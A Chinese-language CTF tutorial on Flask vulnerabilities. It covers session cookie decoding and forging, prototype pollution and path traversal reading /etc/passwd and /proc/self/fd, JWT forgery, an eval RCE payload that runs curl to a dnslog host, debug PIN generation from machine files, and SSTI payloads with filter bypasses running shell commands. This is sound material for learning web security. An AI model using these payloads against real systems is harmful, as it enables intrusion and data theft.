介绍
Python-Flask简介
Flask是一个Web应用程序框架,使用Python编写。该软件由ArminRonacher开发,他领导着Pocco国际Python爱好者小组。该软件基于WerkzeugWSGI工具箱和Jinja2模板引擎.
Flask有许多扩展,例如ORM、窗体验证工具、文件上传、身份验证,
使用Flask可以快速地搭建一个WEB应用,Flask默认使用Jinja2作为模板,Flask会自动配置Jinja 模板而不需要其他配置
本文所有程序已打包:/static/post/CTF_Python_Flask/ext/ext.zip
一个简单的示例
基本的Flask Web应用
源码
Flask应用的默认端口是5000,可以使用port=指定端口
flask_basic.py
from flask import Flask
app = Flask(name)
@app.route('/')
def hello_world():
return 'Hello Flask!'
if name == 'main':
# 默认值:host=127.0.0.1, port=5000, debug=false
#使用port=指定端口:app.run(port=)
app.run()
访问
直接访问,可见
带获取GET请求参数功能的Flask Web应用
源码
flask_basic_get.py
from flask import Flask, request
app = Flask(name)
@app.route('/')
def hello_world():
try:
#GET传参时的参数为name
r = request.args.get('name')
return "Hello " + r
except:
pass
return "Hello"
if name == 'main':
app.run()
访问
get传参name=abc可见
带获取POST请求参数功能的Flask Web应用
源码
flask_basic_post.py
from flask import Flask, request
app = Flask(name)
@app.route('/', methods=['POST'])
def hello_world():
r = request.form.get('name')
print(r)
return "Hello " + r
if name == 'main':
app.run()
访问
post传参name=a后可见
带session功能的Flask Web应用
源码
flask_basic_session.py
import os
import re
import time
import subprocess
from flask import Flask, make_response, session
app = Flask(name)
app.config['SECRET_KEY'] = 'AAAAAAAAAA'
def response(content, status):
resp = make_response(content, status)
return resp
@app.route('/', methods=['GET'])
def main():
if not session.get('user'):
session['user'] = 'Guest'
try:
user = session.get('user')
return 'Hello ' + user
except:
return response("Not Found.", 404)
if name == 'main':
app.run()
访问
可以看到成功获取了session中user的值
Flask的session的内容放在客户端中的cookie
CTF中的Flask应用
SESSION相关
获取SESSION中保存的重要信息
flask中session是保存在客户机上的,并且只需进行简单的base64解码操作即可读取session的内容
flask在生成session时会使用app.config[‘SECRET_KEY’]中的值作salt对session进行签名
也就是说,flask保证session不被随意篡改,但不保证session的内容不随意泄露
可以使用以下程序获取session内容
源码
flask_session_decode.py
!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if name == 'main':
print(decryption(sys.argv[1].encode()))
例如有session如下
eyJ1cGRpciI6ImZpbGVpbmZvLy4uIiwidXNlciI6IkFkbWluaXN0cmF0b3IifQ.Y0Fj2g.UXNKMoSXrDAqOt90FWrOtZa9iNI
解码命令
python flask_session_decode.py session内容
SESSION伪造
未知secret_key
读取内存获取secret key
此部分详见本文Cat cat部分
通过任意文件读取直接读取app.py,适用于secret_key直接写在 (app.py路径可能在/proc/self/cmdline查看当前进程的命令中可以获取)
通过任意文件读取先通过/proc/self/maps读取堆栈分布, 再通过/proc/self/mem读取内存分布来获取
读到secret_key后进入下面的已知secret_key伪造部分
已知secret_key伪造
伪造的SESSION可以达到修改信息的目的(因为flask的session存放在客户端)
使用以下程序可以伪造session
flask_session_cookie_manager3.py
!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
author = 'Wilson Sumanang, Alexandre ZANNI'
standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast
Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
from abc import ABCMeta, abstractmethod
else: # > 3.4
from abc import ABC, abstractmethod
Lib for argument parsing
import argparse
external Imports
from flask.sessions import SecureCookieSessionInterface
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
class FSCM(metaclass=ABCMeta):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
else: # > 3.4
class FSCM(ABC):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
if name == "main":
# Args are only relevant for __main__ usage
## Description for help
parser = argparse.ArgumentParser(
description='Flask Session Cookie Decoder/Encoder',
epilog="Author : Wilson Sumanang, Alexandre ZANNI")
## prepare sub commands
subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
## create the parser for the encode command
parser_encode = subparsers.add_parser('encode', help='encode')
parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
help='Secret key', required=True)
parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
help='Session cookie structure', required=True)
## create the parser for the decode command
parser_decode = subparsers.add_parser('decode', help='decode')
parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
help='Secret key', required=False)
parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
help='Session cookie value', required=True)
## get args
args = parser.parse_args()
## find the option chosen
if(args.subcommand == 'encode'):
if(args.secret_key is not None and args.cookie_structure is not None):
print(FSCM.encode(args.secret_key, args.cookie_structure))
elif(args.subcommand == 'decode'):
if(args.secret_key is not None and args.cookie_value is not None):
print(FSCM.decode(args.cookie_value,args.secret_key))
elif(args.cookie_value is not None):
print(FSCM.decode(args.cookie_value))
encode.py
from flask_session_cookie_manager3 import FSCM
secret_key = "engine-1"
data = '{"updir":"fileinfo/..","user":"Administrator"}'
d = FSCM.encode(secret_key, data)
print(d)
flask_session_cookie_manager使用方法
命令行使用
注意需要python3
python flask_session_cookie_manager3.py encode -s "secret的值" -t "内容"
以调用包的形式
将flask_session_cookie_manager3.py和encode.py放在同一个目录
然后运行encode.py,结果就是伪造的session
装饰器
Python 装饰器顺序错误导致的未授权访问
RealWorld CTF 2018 bookhub
源码如下,可以看到函数有两个装饰器,
一个是用于检查是否已经登录的装饰器login_required,另一个是flask的路由的装饰器,用于刷新session
如下代码这样子是存在问题的
@login_required
@user_blueprint.route('/admin/system/refresh_session/', methods=['POST'])
def refresh_session():
anyCode
Python中,装饰器的执行顺序是从靠近函数的装饰器开始的
当我们需要先验证有没有登录,再验证用户权限时,应该像下面这样写
@login_required
@permision_allowed
def f()
anyCode
下面这个是对上面提及的存在问题的代码的实际顺序解释,这样导致的结果就是鉴权失败
这里没有装饰器
def refresh_session():
pass
route_wrapped = app.route('/admin/refresh_session/')(refresh_session) # route 装饰器
login_wrapped = login_required(route_wrapped) # login 装饰器
引用自http://blog.evalbug.com/2018/08/07/flask_decorator_sequence/
所以正确写法应当如下代码所示
@user_blueprint.route('/admin/system/refresh_session/', methods=['POST'])
@login_required
def refresh_session():
anyCode
任意文件读取
Python原型链污染导致的任意文件读取
DASCTF-2023-7月赛-ezflask
先来看源码(以下代码可以直接运行,前提是装好flask)
import uuid
from flask import Flask, request, session
import json
app = Flask(name)
app.secret_key = str(uuid.uuid4())
black_list = ["init"]
def check(data):
for i in black_list:
if i in data:
return False
return True
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, 'getitem'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class user():
def init(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False
Users = []
@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"
@app.route('/login',methods=['POST'])
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Login Failed"
for user in Users:
if user.check(data):
session["username"] = data["username"]
return "Login Success"
except Exception:
return "Login Failed"
return "Login Failed"
@app.route('/',methods=['GET'])
def index():
return open(file, "r").read()
if name == "main":
app.run(host="0.0.0.0", port=5010)
简单看一遍源码,容易发现以下部分比较特殊
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, 'getitem'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
再配合上这个user类,非常容易想到原型链污染
详情建议看看这篇文章,解释的非常清楚:https://tttang.com/archive/1876/
class user():
def init(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False
仔细阅读代码,可以发现有一个读文件的地方
所以我们可以对魔术变量file进行污染
@app.route('/',methods=['GET'])
def index():
return open(file, "r").read()
如果对flask这个框架的配置有所了解的话,还可以选择static_folder这个全局变量进行污染
"_static_folder":"/"
因为flask可以通过static_folder配置用于放置css、js等静态文件的目录,
设置后即可直接通过url访问文件,例如访问http://[server]/etc/passwd
def init(
self,
import_name,
static_url_path=None,
static_folder='static',
static_host=None,
host_matching=False,
subdomain_matching=False,
template_folder='templates',
instance_path=None,
instance_relative_config=False,
root_path=None
):
根据上面链接的文章描述,容易构造出以下payload
{
"init" : {
"globals" : {
"file":"/etc/passwd"
}
}
}
再来看下如何进行原型链污染
容易发现它取了post的内容,经过check函数后进行json反序列化,最后再merge生成user对象
也就是说我们直接post json即可
@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
只需要构造以下内容
{
"username":"a",
"password":"b",
"init" : {
"globals" : {
"file":"/etc/passwd"
}
}
}
那么问题来了,init被check函数过滤了,要怎么办呢?
这里给出两种解法:
第一种是利用Python json库的解析特性和python字符串判断的差异,使用Unicode绕过
{
"init\u005f_" : {
"globals" : {
"file__":"/etc/passwd"
}
}
}
(想理解下边这个解法的话可以看看上面链接的文章,讲的非常好)
{
"check" : {
"globals" : {
"file":"/etc/passwd"
}
}
}
后面的考点就是伪造pin码RCE了,这里就不多解释了,本文已有记载
配合目录穿越
2022网鼎杯-web669
直接读取文件、参数可控且过滤不全
以下为部分关键代码
.............
其它部分已省略
@app.route('/', methods=['GET'])
def download(file):
if session.get('updir'):
basedir = session.get('updir')
try:
path = os.path.join(basedir, file).replace('../', '')
if os.path.isfile(path):
return send_file(path)
else:
return response("Not Found.", 404)
except:
return response("Failed.", 500)
.............
其它部分已省略
由于对../的处理只是简单使用replace方法进行替换置空,因此使用双写../(....//)即可进行绕过
path = os.path.join(basedir, file).replace('../', '')
然后接下来使用flask的send_file模块读取文件
if os.path.isfile(path):
return send_file(path)
实现了任意文件读取
使用open打开文件但未close
配合任意文件读取/proc/self/fd
2020网鼎杯白虎组Web-PicDown
app.py源码如下
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
app = Flask(name)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
@app.route('/')
def index():
return render_template('search.html')
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"
return res
if name == 'main':
app.run(host='0.0.0.0', port=8080)
任意文件读取
任意文件读取由以下代码实现
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
代码审计
SECRET_KEY藏在/tmp/secret.txt,可是已经被删除了
但是可以发现没有使用f.close()关闭文件句柄
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
以下程序可以执行shell, 但是需要key,即前面提到的SECRET_KEY
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"
return res
已知使用open打开文件会创建文件描述符,
即在/proc/self/fd中创建名为x的”文件”(x代表一个整数)(unix万物皆为文件的思想)
由于此次读取文件没有进行close操作,创建文件描述符的文件描述符还没有删除,
可以直接读取/proc/self/fd/x,x可以从1开始逐渐增加来穷举,读到的内容就是/tmp/secret.txt的内容
示例payload如下
/page?url=../../../../proc/self/fd/1
解释如下:
当程序打开一个文件, 会获得程序的文件描述符, 而此时如果文件被删除, 只会删除文件的目录项, 不会清空文件的内容, 原来的进程依然可以通过描述符对文件进行读取, 也就是说, 文件还存在内存里
文件上传(配合软链接)
2022美团杯-OnlineUnzip
题目允许用户上传zip文件
以下代码是服务端使用unzip命令解压用户上传的zip文件的实现
unzip命令默认禁止了zip slip,即虽然zip文件可以打包包含../路径的文件,但unzip命令解压时会忽略../(避免了任意写文件)
zip slip
通过目录遍历文件名(例如../../evil.sh)的精心构建的存档文件攻击者可以通过Zip Slip 漏洞把恶意文件复制到操作系统中(超出应用本身的控制范围之外)。Zip Slip漏洞可影响多种存档格式,包括zip、tar、jar、war、cpio、apk、rar和7z。
.............
其它部分已省略
def extractFile(filepath):
extractdir=filepath.split('.')[0]
if not os.path.exists(extractdir):
os.makedirs(extractdir)
os.system(f'unzip -o {filepath} -d {extractdir}')
return redirect(url_for('display',extractdir=extractdir))
.............
其它部分已省略
解压的文件由以下代码实现文件列表展示(使用os.listdir进行目录读取,使用open进行文件读取)
不允许出现..,避免了目录穿越
@app.route('/display', methods=['GET'])
@app.route('/display/', methods=['GET'])
@app.route('/display/', methods=['GET'])
def display(extractdir=''):
if re.search(r"..", extractdir, re.M | re.I) != None:
return "Hacker?"
else:
if not os.path.exists(extractdir):
return make_response("error", 404)
else:
if not os.path.isdir(extractdir):
f = open(extractdir, 'rb')
response = make_response(f.read())
response.headers['Content-Type'] = 'application/octet-stream'
return response
else:
fn = os.listdir(extractdir)
fn = [".."] + fn
f = open("templates/template.html")
x = f.read()
f.close()
ret = "
文件列表:
"
for i in fn:
tpath = os.path.join('/display', extractdir, i)
ret += " " + i + "
"
x = x.replace("HTMLTEXT", ret)
return x
创建一个根目录的软连接
ln -s / root_dir
然后进行zip压缩(-y参数用于保持软连接)
zip -r myzip.zip root_dir -y
zip内容如下
上传之后即可遍历根目录,并读取文件
如何避免目录穿越
避免用户直接控制读取文件的参数从而能够读取磁盘上的任意文件
使用静态资源
所有静态资源可以被访问者直接获取
默认位置
FLASK APP运行目录下的static文件夹为静态目录
from flask import Flask
创建flask的应用对象
name表示当前的模块名称
模块名: flask以这个模块所在的目录为根目录,默认这个目录中的static为静态目录,templates为模板目录
app = Flask(name)
设置静态目录
from flask import Flask
app = Flask(import_name=name,
static_url_path='/static', # 配置静态文件的访问 url 前缀
static_folder='static' # 配置静态文件的文件夹
)
引用自https://blog.51cto.com/u_11239407/5437426
使用Flask的动态路由
(URL路径参数)
参数类型说明
动态路由的参数类型默认是 string,但是也可以指定其他类型,比如数字 int 等
类型 说明
string 默认,可以不用写
int 同 int,但是仅接受浮点数
float 同 int,但是仅接受浮点数
path 和 string 相似,但接受斜线
引用自https://blog.51cto.com/u_12020737/3090824
注意:使用string类型的路径参数仍然存在目录穿越的可能
示例
用户通过访问/file/id读取信息
通过open直接打开文件
@app.route('/file/')
def user_info(id):
try:
path = f'static/{id}.json'
if os.path.isfile(path):
with open(path, 'rb') as file:
return file.read()
except:
return 'Err', 500
return '404 Not Found', 404
通过flask的sendfile模块
from flask import send_file
@app.route('/file/')
def user_info(id):
try:
path = f'static/{id}.json'
if os.path.isfile(path):
return send_file(path)
except:
return 'Err', 500
return '404 Not Found', 404
JWT相关
通过JWT库的漏洞
python-jwt这个库在版本< 3.3.4存在漏洞
详情可以查看此处:https://github.com/davedoesdev/python-jwt/security/advisories/GHSA-5p8v-58qm-c7fp
JWT伪造
摘录自测试用例https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py
import json
from jwcrypto.common import base64url_decode, base64url_encode
def topic(topic):
[header, payload, signature] = topic.split('.')
parsed_payload = json.loads(base64url_decode(payload))
parsed_payload['sub'] = 'bob'
parsed_payload['exp'] = 2000000000
fake_payload = base64url_encode((json.dumps(parsed_payload, separators=(',', ':'))))
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
jwt = "xxxx.xxx.xxx"
print(topic(jwt))
2022祥云杯 FunWEB
此题需要使key'is_admin' 的value为1来获取graphql 查询权限
伪造jwt的EXP如下(注意token每过一段时间会过期,需要重新生成)
from datetime import timedelta
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode
def topic(topic):
""" Use mix of JSON and compact format to insert forged claims including long expiration """
[header, payload, signature] = topic.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['is_admin'] = 1
parsed_payload['exp'] = 2000000000
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
token = topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g')
print(token)
此exp原文链接:https://blog.csdn.net/m0_64910183/article/details/127661200
RCE(远程代码/命令执行)
通过代码中存在的漏洞
一个简单的计算表达式的服务,使用了eval函数
get传参eval即可代码执行
from flask import Flask, request
app = Flask(name)
@app.route('/')
def hello_world():
try:
r = request.args.get('eval')
return f"Result:{eval(r)}"
except Exception as e:
print(e)
pass
return "Hello"
if name == 'main':
app.run()
传参如下实现无回显命令执行(相当于执行os.system(),执行curl y3j4ey.dnslog.cn)
import('os').system('curl y3j4ey.dnslog.cn')
DNSLog显示有请求
通过伪造debug pin码(需要读取主机上几个文件)
(前提是开启调试模式)
示例程序
flask_basic_get_debug_pin.py
由于没有处理r为None的情况,就把None Type的r直接与字符串”Hello “拼接导致出错
from flask import Flask, request
app = Flask(name)
@app.route('/')
def hello_world():
r = request.args.get('name')
if r != '':
return "Hello " + r
else:
return "Hello"
if name == 'main':
app.run(debug=True)
报错界面
点击右边小图标可进入调试模式
要求输入pin码
可以以交互模式执行python程序
需要
获取启动Flask应用的用户名(可以读取/etc/passwd获取)(获取username)
一般默认:flask.app(获取modname)
flask目录下的一个app.py的绝对路径(可以通过报错页面看到)(获取app.py的绝对路径)(类似:/usr/local/lib/python3.5/site-packages/flask/app.py)
以及读取以下几个文件
/sys/class/net/eth0/address(可能不是eth0,可能是ensxx)(获取网卡地址)
/proc/self/cgroup、/etc/machine-id、/proc/sys/kernel/random/boot_id(获取machine_id)
坑点:有的版本的flask只要读到三个文件中任意一个文件即可,
有的版本从/etc/machine-id、/proc/sys/kernel/random/boot_id中任意一个文件读到值后就和/proc/self/cgroup中的id值拼接)
pin码生成程序如下(适用于新版的flask)
import hashlib
from itertools import chain
probably_public_bits = [
'root',# username
'flask.app',# modname
'Flask',# getattr(app, 'name', getattr(app.class, 'name'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, 'file', None),
]
private_bits = [
'2485377892354',# str(uuid.getnode()), /sys/class/net/ens33/address
'32e48d371198e8420c53b0a1fa37e94d'# get_machine_id(), /etc/machine-id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
If we need to generate a pin we salt it a bit more so that we don't
end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
Format the pincode in groups of digits for easier remembering if
we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x : x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num
print(rv)
新旧版本flask debug pin码生成可以参考:https://blog.csdn.net/qq_42303523/article/details/124232532
区别是旧版计算摘要信息(digest)用的是md5,新版计算摘要信息用的是sha1
通过Debug模式热加载
flask开启debug模式时,当文件被修改(包括被import的py文件被修改),就会重启整个flask服务,相当于重新执行这个py文件
CISCN 2023 go_session
前面的go部分存在ssti(使用pongo2作为模板引擎)
可以传入参数name,利用c这个对象里面的方法
如下就是上传一个文件的payload
{%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form)%}{
{c.SaveUploadedFile(file,path)}}&m=xxx&n=xx
然后将保存地址设为app.py,覆盖原来的py程序,即可完成利用
SSTI(模板注入)
在实例化Flask APP对象时可以设置模板存放位置,然后flask渲染模板时会在此位置下找
app = Flask(import_name=name,
template_folder='templates') # 配置模板文件的文件夹
Flask默认使用Jinja 2作为模板引擎
Jinja的语法有以下几种:
{%....%}语句(Statements)
{f .…H}打印模板输出的表达式(Expressions)
{#....#}注释
...##行语句(Line Statements)
一个基本的flask模板使用
在字符串中使用模板
可以直接在字符串中使用{
{
`}}、{% `%}等来制作模板
flask_basic_render.py
from flask import Flask, render_template_string
app = Flask(name)
@app.route('/')
def hello_world():
n = "aaa"
return render_template_string("Hello {
{name}}", name=n)
if name == 'main':
app.run()
效果如下
在模板文件中
可以写在文件,比如index.html
然后将index.html放在templates文件夹中(默认模板文件夹是templates)
{ {content}}
渲染模板
flask_basic_ren_html.py
from flask import Flask, render_template
app = Flask(name)
@app.route('/')
def hello_world():
c = "Hello"
return render_template("index.html", content=c)
if name == 'main':
app.run()
效果如下
可以发现{ {content}}已经被渲染了
一个基本的ssti漏洞
flask_basic_get_ssti.py
from flask import Flask, render_template_string, request
app = Flask(name)
@app.route('/')
def hello_world():
name='guest'
r = request.args.get('name')
if r != '' and r != None:
name = r
return render_template_string("Hello %s" % name)
if name == 'main':
app.run()
代码执行
执行os.popen
{
{().class.bases[0].subclasses()[140].init.globals['builtins']'eval'.popen('whoami').read()")}}
{%print(lipsum.globals'geti''tem''pop''en'.read())%}
{%print(lipsum|attr("globals"))|attr("getitem")("os")|attr("popen")("whoami")|attr("read")()%}
过滤单双引号
{
{[].class.mro[-1].subclasses()407.communicate()[0]}}&a=cat /flag
过滤中括号和单双引号
{
{url_for.globals.os.popen(request.cookies.cmd).read()}}
过滤下划线
{
{(lipsum|attr(request.values.b)).os.popen(request.values.a).read()}}&a=cat%20/flag&b=globals
过滤os
{
{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=globals&b=os&c=cat /flag
寻找可利用类
class 类的一个内置属性,表示实例对象的类。
base 类型对象的直接基类
bases 类型对象的全部基类,以元组形式,类型的实例通常没有属性
mro 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
subclasses() 返回这个类的子类集合
init 初始化类,返回的类型是function,通过此方法来调用 globals方法
globals 使用方式是 函数名.globals获取function所处空间下可使用的module、方法以及所有变量。
dic 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的dict里
getattribute() 实例、类、函数都具有的getattribute魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用getattribute方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
getitem() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.getitem('b')
builtins 这里 builtins 是内建名称空间,是这个模块本身定义的一个名称空间,在这个内建名称空间中存在一些我们经常用到的内置函数(即不需要导入包即可调用的函数)如:print()、str()还包括一些异常和其他属性。
import 动态加载类和函数,也就是导入模块,经常用于导入os模块,
str() 返回描写这个对象的字符串,可以理解成就是打印出来。
url_for flask的一个方法,可以用于得到builtins,而且url_for.globals['builtins']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到builtins,而且get_flashed_messages.globals['builtins']含有current_app。
lipsum flask的一个方法,可以用于得到builtins,而且lipsum.globals含有os模块:{ {lipsum.globals['os'].popen('ls').read()}}
current_app 应用上下文,一个全局变量。
request.args.x1 get传参
request.values.x1 所有参数
request.cookies cookies参数
request.headers 请求头参数
request.form.x1 post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data post传参 (Content-Type:a/b)
request.json post传json (Content-Type: application/json)
config 当前application的所有配置。
g { {g}}得到
读取配置信息
当一些代码执行、命令执行的函数被阻拦,重要信息可能就在config中
例如SECRET KEY
{
{config}}
RCE中的沙盒逃逸
2024巅峰极客php_online
题目提供了源代码
from flask import Flask, request, session, redirect, url_for, render_template
import os
import secrets
app = Flask(name)
app.secret_key = secrets.token_hex(16)
working_id = []
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
id = request.form['id']
if not id.isalnum() or len(id) != 8:
return '无效的ID'
session['id'] = id
if not os.path.exists(f'/sandbox/{id}'):
os.popen(f'mkdir /sandbox/{id} && chown www-data /sandbox/{id} && chmod a+w /sandbox/{id}').read()
return redirect(url_for('sandbox'))
return render_template('submit_id.html')
@app.route('/sandbox', methods=['GET', 'POST'])
def sandbox():
if request.method == 'GET':
if 'id' not in session:
return redirect(url_for('index'))
else:
return render_template('submit_code.html')
if request.method == 'POST':
if 'id' not in session:
return 'no id'
user_id = session['id']
if user_id in working_id:
return 'task is still running'
else:
working_id.append(user_id)
code = request.form.get('code')
os.popen(f'cd /sandbox/{user_id} && rm *').read()
os.popen(f'sudo -u www-data cp /app/init.py /sandbox/{user_id}/init.py && cd /sandbox/{user_id} && sudo -u www-data python3 init.py').read()
os.popen(f'rm -rf /sandbox/{user_id}/phpcode').read()
php_file = open(f'/sandbox/{user_id}/phpcode', 'w')
php_file.write(code)
php_file.close()
result = os.popen(f'cd /sandbox/{user_id} && sudo -u nobody php phpcode').read()
os.popen(f'cd /sandbox/{user_id} && rm *').read()
working_id.remove(user_id)
return result
if name == 'main':
app.run(debug=False, host='0.0.0.0', port=80)
我们关注这个下面代码所示部分,这个部分较为核心
简单分析代码,可知可以使用一个8位的用户名创建一个沙盒,并在沙盒中用nobody(linux系统中的一个用户)这个低权限用户来执行php代码
working_id.append(user_id)
code = request.form.get('code')
os.popen(f'cd /sandbox/{user_id} && rm *').read()
os.popen(f'sudo -u www-data cp /app/init.py /sandbox/{user_id}/init.py && cd /sandbox/{user_id} && sudo -u www-data python3 init.py').read()
os.popen(f'rm -rf /sandbox/{user_id}/phpcode').read()
php_file = open(f'/sandbox/{user_id}/phpcode', 'w')
php_file.write(code)
php_file.close()
result = os.popen(f'cd /sandbox/{user_id} && sudo -u nobody php phpcode').read()
os.popen(f'cd /sandbox/{user_id} && rm *').read()
working_id.remove(user_id)
待更新
